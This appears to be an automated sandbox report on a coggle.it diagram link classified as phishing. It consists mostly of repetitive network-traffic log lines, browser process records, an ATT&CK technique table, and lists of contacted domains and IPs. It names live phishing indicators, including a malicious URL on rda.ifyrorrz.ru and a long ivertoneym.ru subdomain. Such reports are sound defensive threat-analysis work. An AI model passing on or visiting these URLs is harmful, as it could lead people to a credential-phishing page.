Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57139
Source: unknownNetwork traffic detected: HTTP traffic on port 57095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57147
Source: unknownNetwork traffic detected: HTTP traffic on port 57152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57143
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57147 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57149
Source: unknownNetwork traffic detected: HTTP traffic on port 57130 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57155
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57156
Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57157
Source: unknownNetwork traffic detected: HTTP traffic on port 57153 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57158
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57151
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57152
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57153
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57154
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 57111 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57150
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57186 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57159
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57105 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57162
Source: unknownNetwork traffic detected: HTTP traffic on port 57175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57163
Source: unknownNetwork traffic detected: HTTP traffic on port 57158 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57160
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57161
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 57139 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 57168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 57113 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 57163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57107 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57103
Source: unknownNetwork traffic detected: HTTP traffic on port 57128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 57118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 57185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57109
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57105
Source: unknownNetwork traffic detected: HTTP traffic on port 57101 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57106
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57107
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57111
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57114
Source: unknownNetwork traffic detected: HTTP traffic on port 57092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57157 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57110
Source: unknownNetwork traffic detected: HTTP traffic on port 57134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57119
Source: unknownNetwork traffic detected: HTTP traffic on port 57123 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57125
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57112 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57103 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57155 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57096
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57097
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57098
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57099
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57094
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57095
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57098 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57132 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57090
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57091
Source: unknownNetwork traffic detected: HTTP traffic on port 57138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57149 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57108 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 57161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57150 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57133 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57160 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57175
Source: unknownNetwork traffic detected: HTTP traffic on port 57159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57170
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57171
Source: unknownNetwork traffic detected: HTTP traffic on port 57136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57172
Source: unknownNetwork traffic detected: HTTP traffic on port 57188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57125 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57188
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57184
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57185
Source: unknownNetwork traffic detected: HTTP traffic on port 57183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57186
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57180
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57183
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57110 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57131 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57109 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57089
Source: unknownNetwork traffic detected: HTTP traffic on port 57154 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57137 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57171 -> 443
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.17:49781 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.17:49785 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.69.42.241:443 -> 192.168.2.17:57089 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:57091 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:57092 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:57093 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.31.71:443 -> 192.168.2.17:57100 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:57103 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.17:57120 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.win@25/63@59/414
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=1944,i,16644133518203145411,8735504109828128568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=1944,i,16644133518203145411,8735504109828128568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a095260%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
d1tcqh4bio8cty.cloudfront.net
18.173.205.118
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      ws.coggle.it
      108.128.83.135
      truefalse
        unknown
        rda.ifyrorrz.ru
        172.67.163.249
        truetrue
          unknown
          s-part-0017.t-0009.t-msedge.net
          13.107.246.45
          truefalse
            high
            a5e6afisv074uluskhfn7m4zmfzuo4gl1tuewj5h5eqm3kd85bkxp7j48lwc.ivertoneym.ru
            104.21.42.208
            truefalse
              unknown
              coggle.it
              108.128.83.135
              truefalse
                unknown
                static.coggle.it
                13.32.121.109
                truefalse
                  unknown
                  stripecdn.map.fastly.net
                  151.101.128.176
                  truefalse
                    high
                    r.stripe.com
                    54.186.23.98
                    truefalse
                      high
                      bg.microsoft.map.fastly.net
                      199.232.214.172
                      truefalse
                        high
                        s3-r-w.eu-west-1.amazonaws.com
                        3.5.69.65
                        truefalse
                          unknown
                          code.jquery.com
                          151.101.130.137
                          truefalse
                            high
                            m.stripe.com
                            54.213.36.135
                            truefalse
                              high
                              cdnjs.cloudflare.com
                              104.17.25.14
                              truefalse
                                high
                                challenges.cloudflare.com
                                104.18.94.41
                                truefalse
                                  high
                                  dexeqbeb7giwr.cloudfront.net
                                  99.86.4.99
                                  truefalse
                                    high
                                    stripe.com
                                    18.202.131.124
                                    truefalse
                                      high
                                      sni1gl.wpc.omegacdn.net
                                      152.199.21.175
                                      truefalse
                                        high
                                        www.google.com
                                        142.250.184.196
                                        truefalse
                                          high
                                          api.stripe.com
                                          34.250.89.120
                                          truefalse
                                            high
                                            241.42.69.40.in-addr.arpa
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.office.com
                                              unknown
                                              unknownfalse
                                                high
                                                m.stripe.network
                                                unknown
                                                unknownfalse
                                                  high
                                                  aadcdn.msftauth.net
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    coggle-attachments-production-eu-west-1.s3.eu-west-1.amazonaws.com
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      identity.nel.measure.office.net
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        login.microsoftonline.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          js.stripe.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            200.163.202.172.in-addr.arpa
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              NameMaliciousAntivirus DetectionReputation
                                                              https://rda.ifyrorrz.ru/mEzron5/true
                                                                unknown
                                                                https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/threeways-garage-limited/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526true
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  13.107.6.156
                                                                  unknownUnited States
                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                  3.5.69.65
                                                                  s3-r-w.eu-west-1.amazonaws.comUnited States
                                                                  14618AMAZON-AESUSfalse
                                                                  142.250.74.200
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  13.107.246.45
                                                                  s-part-0017.t-0009.t-msedge.netUnited States
                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                  142.250.186.174
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  13.32.121.109
                                                                  static.coggle.itUnited States
                                                                  16509AMAZON-02USfalse
                                                                  216.58.206.78
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  104.18.94.41
                                                                  challenges.cloudflare.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  3.161.82.126
                                                                  unknownUnited States
                                                                  16509AMAZON-02USfalse
                                                                  172.67.163.249
                                                                  rda.ifyrorrz.ruUnited States
                                                                  13335CLOUDFLARENETUStrue
                                                                  99.86.4.99
                                                                  dexeqbeb7giwr.cloudfront.netUnited States
                                                                  16509AMAZON-02USfalse
                                                                  40.126.31.71
                                                                  unknownUnited States
                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                  142.250.185.202
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  151.101.130.137
                                                                  code.jquery.comUnited States
                                                                  54113FASTLYUSfalse
                                                                  13.69.109.131
                                                                  unknownUnited States
                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                  142.250.181.238
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  40.126.32.76
                                                                  unknownUnited States
                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                  104.21.42.208
                                                                  a5e6afisv074uluskhfn7m4zmfzuo4gl1tuewj5h5eqm3kd85bkxp7j48lwc.ivertoneym.ruUnited States
                                                                  13335CLOUDFLARENETUSfalse
